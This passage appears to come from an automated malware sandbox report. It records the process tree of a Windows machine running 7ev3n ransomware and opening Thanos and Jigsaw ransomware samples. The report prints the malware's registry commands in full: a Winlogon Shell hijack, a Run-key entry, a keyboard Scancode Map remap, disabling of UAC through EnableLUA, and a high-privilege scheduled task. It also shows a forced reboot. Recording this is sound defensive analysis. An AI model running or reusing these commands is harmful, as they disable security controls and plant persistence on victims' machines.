                                                                                                                                        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                                        4⤵
                                                                                                                                        • Modifies WinLogon for persistence
                                                                                                                                        PID:6404
                                                                                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                                      3⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:5528
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                                        4⤵
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:6876
                                                                                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:3260
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                                                          4⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:6624
                                                                                                                                      • C:\windows\SysWOW64\cmd.exe
                                                                                                                                        C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:4152
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                                                            4⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:6968
                                                                                                                                        • C:\windows\SysWOW64\cmd.exe
                                                                                                                                          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:5792
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                              4⤵
                                                                                                                                                PID:7024
                                                                                                                                            • C:\windows\SysWOW64\cmd.exe
                                                                                                                                              C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                                                              3⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:2000
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                                                                4⤵
                                                                                                                                                • UAC bypass
                                                                                                                                                PID:6864
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                              3⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:2676
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:7120
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
                                                                                                                                              3⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:6256
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                4⤵
                                                                                                                                                  PID:7072
                                                                                                                                                • C:\Windows\SysWOW64\shutdown.exe
                                                                                                                                                  shutdown -r -t 10 -f
                                                                                                                                                  4⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:5992
                                                                                                                                            • C:\Users\Admin\Downloads\7ev3n.exe
                                                                                                                                              "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:5752
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                                                                                                3⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1988
                                                                                                                                              • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                                                                C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
                                                                                                                                                3⤵
                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                PID:464
                                                                                                                                              • C:\windows\SysWOW64\cmd.exe
                                                                                                                                                C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:6164
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Modifies WinLogon for persistence
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:6996
                                                                                                                                                • C:\windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6192
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                                                      4⤵
                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:7004
                                                                                                                                                  • C:\windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6200
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:7064
                                                                                                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:6208
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                                                                        4⤵
                                                                                                                                                          PID:7072
                                                                                                                                                      • C:\windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:6224
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:7080
                                                                                                                                                      • C:\windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:6232
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • UAC bypass
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:6988
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5752 -s 1332
                                                                                                                                                        3⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:6736
                                                                                                                                                    • C:\Users\Admin\Downloads\7ev3n.exe
                                                                                                                                                      "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                                                                                                      2⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:4296
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3260
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 1744
                                                                                                                                                          3⤵
                                                                                                                                                          • Program crash
                                                                                                                                                          PID:6896
                                                                                                                                                      • C:\Users\Admin\Downloads\7ev3n.exe
                                                                                                                                                        "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4328
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3164
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3992
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                                                4⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:7092
                                                                                                                                                          • C:\Users\Admin\Downloads\7ev3n.exe
                                                                                                                                                            "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:3164
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                                                                                                              3⤵
                                                                                                                                                                PID:6156
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:5744
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:5468
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:5300
                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4996
                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5044
                                                                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3408
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:1224
                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:3308
                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Thanos.zip\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:2616
                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Thanos.zip\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                              PID:3704
                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {49633c3b-daed-4b3c-afd5-89c46a4b6cc7} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" gpu
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3868
                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2428 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff9fc987-35e2-4dd8-91cf-f3028b3f403d} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" socket
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:3144
                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3208 -childID 1 -isForBrowser -prefsHandle 3212 -prefMapHandle 3180 -prefsLen 24741 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {25796cd0-018f-490f-9862-ba52d4380d33} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:448
                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3644 -childID 2 -isForBrowser -prefsHandle 3636 -prefMapHandle 3444 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd863e00-dde9-4829-ac32-8dda268640d7} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:756
                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4896 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4888 -prefMapHandle 4884 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1a671a22-ebaa-4940-ac97-f894566cd138} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" utility
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                        PID:5292
                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5532 -childID 3 -isForBrowser -prefsHandle 5552 -prefMapHandle 5548 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {179b036f-5672-4d38-baed-e99b20de02a0} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:5776
                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5676 -childID 4 -isForBrowser -prefsHandle 5688 -prefMapHandle 5696 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f7460c2-5e91-45af-82b3-494071532cfd} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:5800
                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5644 -childID 5 -isForBrowser -prefsHandle 5668 -prefMapHandle 5672 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1284 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e439c83-8a6c-4979-8cdc-15f6ed93e98f} 3704 "\\.\pipe\gecko-crash-server-pipe.3704" tab
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:5816
                                                                                                                                                                                      • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                        "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Thanos.zip\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies Internet Explorer Phishing Filter
                                                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                        PID:5064
                                                                                                                                                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5064 CREDAT:17410 /prefetch:2
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                          PID:1528
                                                                                                                                                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5064 CREDAT:17414 /prefetch:2
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                          PID:2432
                                                                                                                                                                                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5064 CREDAT:82956 /prefetch:2
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                          PID:3536
                                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                        PID:4036
                                                                                                                                                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                          "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Thanos.zip\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                          PID:452
                                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                        PID:1232
                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Thanos.zip\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5560
                                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Thanos.zip\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                              PID:5516
                                                                                                                                                                                        • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                          C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                          PID:4352
                                                                                                                                                                                          • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                            "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Thanos.zip\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                            PID:1900
                                                                                                                                                                                        • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                          C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                          PID:5424
                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Jigsaw (1).zip\jigsaw"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:3980
                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Jigsaw (1).zip\jigsaw"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                PID:5572
                                                                                                                                                                                          • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            PID:2644
                                                                                                                                                                                            • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                              "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Jigsaw (1).zip\jigsaw
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                              PID:5172
                                                                                                                                                                                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5172 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                PID:5136
                                                                                                                                                                                          • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                            C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                            PID:4628
                                                                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Jigsaw (1).zip\jigsaw"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                              PID:5312
                                                                                                                                                                                              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:6044
                                                                                                                                                                                                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
